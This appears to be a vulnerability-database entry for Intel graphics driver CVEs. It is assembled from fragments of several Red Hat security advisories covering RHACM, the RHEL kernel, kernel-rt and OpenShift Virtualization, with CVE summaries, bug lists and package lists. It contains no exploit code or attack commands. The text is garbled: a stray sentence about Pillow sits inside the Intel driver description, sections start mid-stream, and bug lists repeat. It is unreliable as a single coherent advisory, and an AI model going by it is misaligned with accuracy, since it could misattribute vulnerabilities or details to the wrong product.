CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
Null pointer reference in some Intel(R) Graphics Drivers for Windows* before version 26.20.100.7212 and before version Linux kernel version 5.5 may allow a privileged user to potentially enable a denial of service via local access. Pillow is a Python-based image processing library.
There is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time. Description:
Red Hat Advanced Cluster Management for Kubernetes 2.2.4 images
Red Hat Advanced Cluster Management for Kubernetes provides the
capabilities to address common challenges that administrators and site
reliability
engineers face as they work across a range of public and private cloud
environments.
Clusters and applications are all visible and managed from a single
console—with security policy built in. See
the following Release Notes documentation, which will be updated shortly
for
this release, for additional details about this release:
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_mana
gement_for_kubernetes/2.2/html/release_notes/
Security fixes:
* redisgraph-tls: redis: integer overflow when configurable limit for
maximum supported bulk input size is too big on 32-bit platforms
(CVE-2021-21309)
* console-header-container: nodejs-netmask: improper input validation of
octal input data (CVE-2021-28092)
* console-container: nodejs-is-svg: ReDoS via malicious string
(CVE-2021-28918)
Bug fixes:
* RHACM 2.2.4 images (BZ# 1957254)
* Enabling observability for OpenShift Container Storage with RHACM 2.2 on
OCP 4.7 (BZ#1950832)
* ACM Operator should support using the default route TLS (BZ# 1955270)
* The scrolling bar for search filter does not work properly (BZ# 1956852)
* Limits on Length of MultiClusterObservability Resource Name (BZ# 1959426)
* The proxy setup in install-config.yaml is not worked when IPI installing
with RHACM (BZ# 1960181)
* Unable to make SSH connection to a Bitbucket server (BZ# 1966513)
* Observability Thanos store shard crashing - cannot unmarshall DNS message
(BZ# 1967890)
3. Solution:
Before applying this update, make sure all previously released errata
relevant to your system have been applied. Bugs fixed (https://bugzilla.redhat.com/):
1932634 - CVE-2021-21309 redis: integer overflow when configurable limit for maximum supported bulk input size is too big on 32-bit platforms
1939103 - CVE-2021-28092 nodejs-is-svg: ReDoS via malicious string
1944827 - CVE-2021-28918 nodejs-netmask: improper input validation of octal input data
1950832 - Enabling observability for OpenShift Container Storage with RHACM 2.2 on OCP 4.7
1952150 - [DDF] It would be great to see all the options available for the bucket configuration and which attributes are mandatory
1954506 - [DDF] Table does not contain data about 20 clusters. Now it's difficult to estimate CPU usage with larger clusters
1954535 - Reinstall Submariner - No endpoints found on one cluster
1955270 - ACM Operator should support using the default route TLS
1956852 - The scrolling bar for search filter does not work properly
1957254 - RHACM 2.2.4 images
1959426 - Limits on Length of MultiClusterObservability Resource Name
1960181 - The proxy setup in install-config.yaml is not worked when IPI installing with RHACM.
1963128 - [DDF] Please rename this to "Amazon Elastic Kubernetes Service"
1966513 - Unable to make SSH connection to a Bitbucket server
1967357 - [DDF] When I clicked on this yaml, I get a HTTP 404 error.
1967890 - Observability Thanos store shard crashing - cannot unmarshal DNS message
5. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
=====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel security and bug fix update
Advisory ID: RHSA-2021:2314-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2021:2314
Issue date: 2021-06-08
CVE Names: CVE-2020-8648 CVE-2020-12362 CVE-2020-12363
CVE-2020-12364 CVE-2020-27170 CVE-2021-3347
=====================================================================
1. Summary:
An update for kernel is now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
3. Description:
The kernel packages contain the Linux kernel, the core of any Linux
operating system.
Security Fix(es):
* kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)
* kernel: Use after free via PI futex state (CVE-2021-3347)
* kernel: use-after-free in n_tty_receive_buf_common function in
drivers/tty/n_tty.c (CVE-2020-8648)
* kernel: Improper input validation in some Intel(R) Graphics Drivers
(CVE-2020-12363)
* kernel: Null pointer dereference in some Intel(R) Graphics Drivers
(CVE-2020-12364)
* kernel: Speculation on pointer arithmetic against bpf_context pointer
(CVE-2020-27170)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Bug Fix(es):
* kernel crash when call the timer function
(sctp_generate_proto_unreach_event) of sctp module (BZ#1707184)
* SCSI error handling process on HP P440ar controller gets stuck
indefinitely in device reset operation (BZ#1830268)
* netfilter: reproducible deadlock on nft_log module autoload (BZ#1858329)
* netfilter: NULL pointer dereference in nf_tables_set_lookup()
(BZ#1873171)
* [DELL EMC 7.9 Bug]: No acpi_pad threads on top command for "power cap
policy equal to 0 watts" (BZ#1883174)
* A race between i40e_ndo_set_vf_mac() and i40e_vsi_clear() in the i40e
driver causes a use after free condition of the kmalloc-4096 slab cache.
(BZ#1886003)
* netxen driver performs poorly with RT kernel (BZ#1894274)
* gendisk->disk_part_tbl->last_lookup retains pointer after partition
deletion (BZ#1898596)
* Kernel experiences panic in update_group_power() due to division error
even with Bug 1701115 fix (BZ#1910763)
* RHEL7.9 - zfcp: fix handling of FCP_RESID_OVER bit in fcp ingress path
(BZ#1917839)
* RHEL7.9 - mm/THP: do not access vma->vm_mm after calling handle_userfault
(BZ#1917840)
* raid: wrong raid io account (BZ#1927106)
* qla2x00_status_cont_entry() missing upstream patch that prevents
unnecessary ABRT/warnings (BZ#1933784)
* RHEL 7.9.z - System hang caused by workqueue stall in qla2xxx driver
(BZ#1937945)
* selinux: setsebool can trigger a deadlock (BZ#1939091)
* [Hyper-V][RHEL-7] Cannot boot kernel 3.10.0-1160.21.1.el7.x86_64 on
Hyper-V (BZ#1941841)
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
5. Package List:
Red Hat Enterprise Linux Client (v. 7):
Source:
kernel-3.10.0-1160.31.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm
kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm
x86_64:
bpftool-3.10.0-1160.31.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm
perf-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source:
kernel-3.10.0-1160.31.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm
kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm
x86_64:
bpftool-3.10.0-1160.31.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm
perf-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source:
kernel-3.10.0-1160.31.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm
kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm
ppc64:
bpftool-3.10.0-1160.31.1.el7.ppc64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-bootwrapper-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debug-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-devel-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-headers-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.ppc64.rpm
perf-3.10.0-1160.31.1.el7.ppc64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
python-perf-3.10.0-1160.31.1.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
ppc64le:
bpftool-3.10.0-1160.31.1.el7.ppc64le.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-bootwrapper-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debug-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-devel-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-headers-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.ppc64le.rpm
perf-3.10.0-1160.31.1.el7.ppc64le.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
python-perf-3.10.0-1160.31.1.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
s390x:
bpftool-3.10.0-1160.31.1.el7.s390x.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
kernel-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debug-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
kernel-debuginfo-common-s390x-3.10.0-1160.31.1.el7.s390x.rpm
kernel-devel-3.10.0-1160.31.1.el7.s390x.rpm
kernel-headers-3.10.0-1160.31.1.el7.s390x.rpm
kernel-kdump-3.10.0-1160.31.1.el7.s390x.rpm
kernel-kdump-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
kernel-kdump-devel-3.10.0-1160.31.1.el7.s390x.rpm
perf-3.10.0-1160.31.1.el7.s390x.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
python-perf-3.10.0-1160.31.1.el7.s390x.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.s390x.rpm
x86_64:
bpftool-3.10.0-1160.31.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm
perf-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-debuginfo-common-ppc64-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.ppc64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64.rpm
ppc64le:
bpftool-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-debuginfo-common-ppc64le-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.ppc64le.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.ppc64le.rpm
x86_64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source:
kernel-3.10.0-1160.31.1.el7.src.rpm
noarch:
kernel-abi-whitelists-3.10.0-1160.31.1.el7.noarch.rpm
kernel-doc-3.10.0-1160.31.1.el7.noarch.rpm
x86_64:
bpftool-3.10.0-1160.31.1.el7.x86_64.rpm
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-devel-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-headers-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-3.10.0-1160.31.1.el7.x86_64.rpm
perf-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64:
bpftool-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debug-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-debuginfo-common-x86_64-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
kernel-tools-libs-devel-3.10.0-1160.31.1.el7.x86_64.rpm
perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
python-perf-debuginfo-3.10.0-1160.31.1.el7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
https://access.redhat.com/security/team/key/
7. References:
https://access.redhat.com/security/cve/CVE-2020-8648
https://access.redhat.com/security/cve/CVE-2020-12362
https://access.redhat.com/security/cve/CVE-2020-12363
https://access.redhat.com/security/cve/CVE-2020-12364
https://access.redhat.com/security/cve/CVE-2020-27170
https://access.redhat.com/security/cve/CVE-2021-3347
https://access.redhat.com/security/updates/classification/#important
8. Contact:
The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
iQIVAwUBYL/x1NzjgjWX9erEAQijGA//bxt7JJkdkIO3eT3vTQ6mYtMErGKBVx8A
sI+zjh/mYmaocA6UrE88bV1ixfJ2xknb9HfFBjQywPAiqTiRXHUyiL24IyGe5Lit
WkPjLRDHCb/q56rl1EGkyr3noikZCNuNF9HOf8PHukJmLqD6iLWWws8J0knY9QyR
/8scePwyCR4wqr2ru5etg5TKx+pkOY+Dfnwhgy6U2thQI58/Flvn7GyOBvSG69M8
6gewtkav1Fnw7WlLT386OjrAajBw6Pd9xee+S7T9qFv/BfC5k0HA26qbnMaAfzle
YKXmjoIV7ExiszvspqZgdlsg0835BUALUIikbpnTvh7Kl2MY2BhBIqJvKOWeT3Mp
VIpkMs4HVALkHoDqzYDZx8WKEy0hrDAjczT+aWtvXJmHEBmsHEx5Ny8tvYk1w3t/
cNVvfj+EqFaSY1GSNY1MG2ZDzIDYWrx+rGKA7tgqtwSlCdYEbORlXCDu+W8+c7Xg
g1vE8kfpkbxyLpvlJ0iOWoLiOCCrZ04fiXXhgSn9O1/zmOwkijFHk5x/aFDEoyBE
O/s2rawA1cADPiLTxGWU9/MITpQuS+FuAc235HT8VRSXvsV3ZHB36N1z4JZcPB5P
FN8hH+ibnEOlpKC7YOE9K4eQ/jG1etWhVWctf7HcP2nbQSpiiZQoQGPznvt+6OKQ
XAOam1B//x4=
=HTlr
-----END PGP SIGNATURE-----
--
RHSA-announce mailing list
RHSA-announce@redhat.com
https://listman.redhat.com/mailman/listinfo/rhsa-announce
. 7) - noarch, x86_64
3. Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables
fine-tuning for systems with extremely high determinism requirements.
Bug Fix(es):
* lru-add-drain workqueue on RT is allocated without being used
(BZ#1894587)
* kernel-rt: update to the latest RHEL7.9.z source tree (BZ#1953118)
4. Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for
Red Hat OpenShift Container Platform. Bugs fixed (https://bugzilla.redhat.com/):
1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve
1945703 - "Guest OS Info" availability in VMI describe is flaky
1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster
1963275 - migration controller null pointer dereference
1965099 - Live Migration double handoff to virt-handler causes connection failures
1965181 - CDI importer doesn't report AwaitingVDDK like it used to
1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod
1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs
1969756 - Windows VMs fail to start on air-gapped environments
1970372 - Virt-handler fails to verify container-disk
1973227 - segfault in virt-controller during pdb deletion
1974084 - 2.6.6 containers
1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted]
1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration
1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner
1982760 - [v2v] no kind VirtualMachine is registered for version \"kubevirt.io/v1\" i...
1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with <= 4.8
5
| VAR-202102-0068 | CVE-2020-12362 | Windows and Linux for Intel(R) Graphics Drivers Integer overflow vulnerability in |
CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
Integer overflow in the firmware for some Intel(R) Graphics Drivers for Windows * before version 26.20.100.7212 and before Linux kernel version 5.5 may allow a privileged user to potentially enable an escalation of privilege via local access. There is a security vulnerability in Intel Graphics Drivers. There is no information about this vulnerability at present. Please pay attention to CNNVD or manufacturer announcements at any time. Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for
Red Hat OpenShift Container Platform. Bugs fixed (https://bugzilla.redhat.com/):
1918750 - CVE-2021-3114 golang: crypto/elliptic: incorrect operations on the P-224 curve
1945703 - "Guest OS Info" availability in VMI describe is flaky
1958816 - [2.6.z] KubeMacPool fails to start due to OOM likely caused by a high number of Pods running in the cluster
1963275 - migration controller null pointer dereference
1965099 - Live Migration double handoff to virt-handler causes connection failures
1965181 - CDI importer doesn't report AwaitingVDDK like it used to
1967086 - Cloning DataVolumes between namespaces fails while creating cdi-upload pod
1967887 - [2.6.6] nmstate is not progressing on a node and not configuring vlan filtering that causes an outage for VMs
1969756 - Windows VMs fail to start on air-gapped environments
1970372 - Virt-handler fails to verify container-disk
1973227 - segfault in virt-controller during pdb deletion
1974084 - 2.6.6 containers
1975212 - No Virtual Machine Templates Found [EDIT - all templates are marked as depracted]
1975727 - [Regression][VMIO][Warm] The third precopy does not end in warm migration
1977756 - [2.6.z] PVC keeps in pending when using hostpath-provisioner
1982760 - [v2v] no kind VirtualMachine is registered for version \"kubevirt.io/v1\" i...
1986989 - OpenShift Virtualization 2.6.z cannot be upgraded to 4.8.0 initially deployed starting with <= 4.8
5. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Important: kernel-rt security and bug fix update
Advisory ID: RHSA-2021:1739-01
Product: Red Hat Enterprise Linux
Advisory URL: https://access.redhat.com/errata/RHSA-2021:1739
Issue date: 2021-05-18
CVE Names: CVE-2019-19523 CVE-2019-19528 CVE-2020-0431
CVE-2020-11608 CVE-2020-12114 CVE-2020-12362
CVE-2020-12464 CVE-2020-14314 CVE-2020-14356
CVE-2020-15437 CVE-2020-24394 CVE-2020-25212
CVE-2020-25284 CVE-2020-25285 CVE-2020-25643
CVE-2020-25704 CVE-2020-27786 CVE-2020-27835
CVE-2020-28974 CVE-2020-35508 CVE-2021-0342
====================================================================
1. Summary:
An update for kernel-rt is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact
of Important. A Common Vulnerability Scoring System (CVSS) base score,
which gives a detailed severity rating, is available for each vulnerability
from the CVE link(s) in the References section.
2. Relevant releases/architectures:
Red Hat Enterprise Linux Real Time (v. 8) - x86_64
Red Hat Enterprise Linux Real Time for NFV (v. 8) - x86_64
3. Description:
The kernel-rt packages provide the Real Time Linux Kernel, which enables
fine-tuning for systems with extremely high determinism requirements.
Security Fix(es):
* kernel: Integer overflow in Intel(R) Graphics Drivers (CVE-2020-12362)
* kernel: use-after-free caused by a malicious USB device in the
drivers/usb/misc/adutux.c driver (CVE-2019-19523)
* kernel: use-after-free bug caused by a malicious USB device in the
drivers/usb/misc/iowarrior.c driver (CVE-2019-19528)
* kernel: possible out of bounds write in kbd_keycode of keyboard.c
(CVE-2020-0431)
* kernel: DoS by corrupting mountpoint reference counter (CVE-2020-12114)
* kernel: use-after-free in usb_sg_cancel function in
drivers/usb/core/message.c (CVE-2020-12464)
* kernel: buffer uses out of index in ext3/4 filesystem (CVE-2020-14314)
* kernel: Use After Free vulnerability in cgroup BPF component
(CVE-2020-14356)
* kernel: NULL pointer dereference in serial8250_isa_init_ports function in
drivers/tty/serial/8250/8250_core.c (CVE-2020-15437)
* kernel: umask not applied on filesystem without ACL support
(CVE-2020-24394)
* kernel: TOCTOU mismatch in the NFS client code (CVE-2020-25212)
* kernel: incomplete permission checking for access to rbd devices
(CVE-2020-25284)
* kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c
(CVE-2020-25285)
* kernel: improper input validation in ppp_cp_parse_cr function leads to
memory corruption and read overflow (CVE-2020-25643)
* kernel: perf_event_parse_addr_filter memory (CVE-2020-25704)
* kernel: use-after-free in kernel midi subsystem (CVE-2020-27786)
* kernel: child process is able to access parent mm through hfi dev file
handle (CVE-2020-27835)
* kernel: slab-out-of-bounds read in fbcon (CVE-2020-28974)
* kernel: fork: fix copy_process(CLONE_PARENT) race with the exiting
- ->real_parent (CVE-2020-35508)
* kernel: use after free in tun_get_user of tun.c could lead to local
escalation of privilege (CVE-2021-0342)
* kernel: NULL pointer dereferences in ov511_mode_init_regs and
ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c (CVE-2020-11608)
For more details about the security issue(s), including the impact, a CVSS
score, acknowledgments, and other related information, refer to the CVE
page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat
Enterprise Linux 8.4 Release Notes linked from the References section.
4. Solution:
For details on how to apply this update, which includes the changes
described in this advisory, refer to:
https://access.redhat.com/articles/11258
The system must be rebooted for this update to take effect.
5. Bugs fixed (https://bugzilla.redhat.com/):
1783434 - CVE-2019-19523 kernel: use-after-free caused by a malicious USB device in the drivers/usb/misc/adutux.c driver
1783507 - CVE-2019-19528 kernel: use-after-free bug caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver
1831726 - CVE-2020-12464 kernel: use-after-free in usb_sg_cancel function in drivers/usb/core/message.c
1833445 - CVE-2020-11608 kernel: NULL pointer dereferences in ov511_mode_init_regs and ov518_mode_init_regs in drivers/media/usb/gspca/ov519.c
1848652 - CVE-2020-12114 kernel: DoS by corrupting mountpoint reference counter
1853922 - CVE-2020-14314 kernel: buffer uses out of index in ext3/4 filesystem
1868453 - CVE-2020-14356 kernel: Use After Free vulnerability in cgroup BPF component
1869141 - CVE-2020-24394 kernel: umask not applied on filesystem without ACL support
1877575 - CVE-2020-25212 kernel: TOCTOU mismatch in the NFS client code
1879981 - CVE-2020-25643 kernel: improper input validation in ppp_cp_parse_cr function leads to memory corruption and read overflow
1882591 - CVE-2020-25285 kernel: race condition between hugetlb sysctl handlers in mm/hugetlb.c
1882594 - CVE-2020-25284 kernel: incomplete permission checking for access to rbd devices
1886109 - BUG: using smp_processor_id() in preemptible [00000000] code: handler106/3082 [rhel-rt-8.4.0]
1894793 - After configure hugepage and reboot test server, kernel got panic status.
1895961 - CVE-2020-25704 kernel: perf_event_parse_addr_filter memory
1896842 - host locks up when running stress-ng itimers on RT kernel.
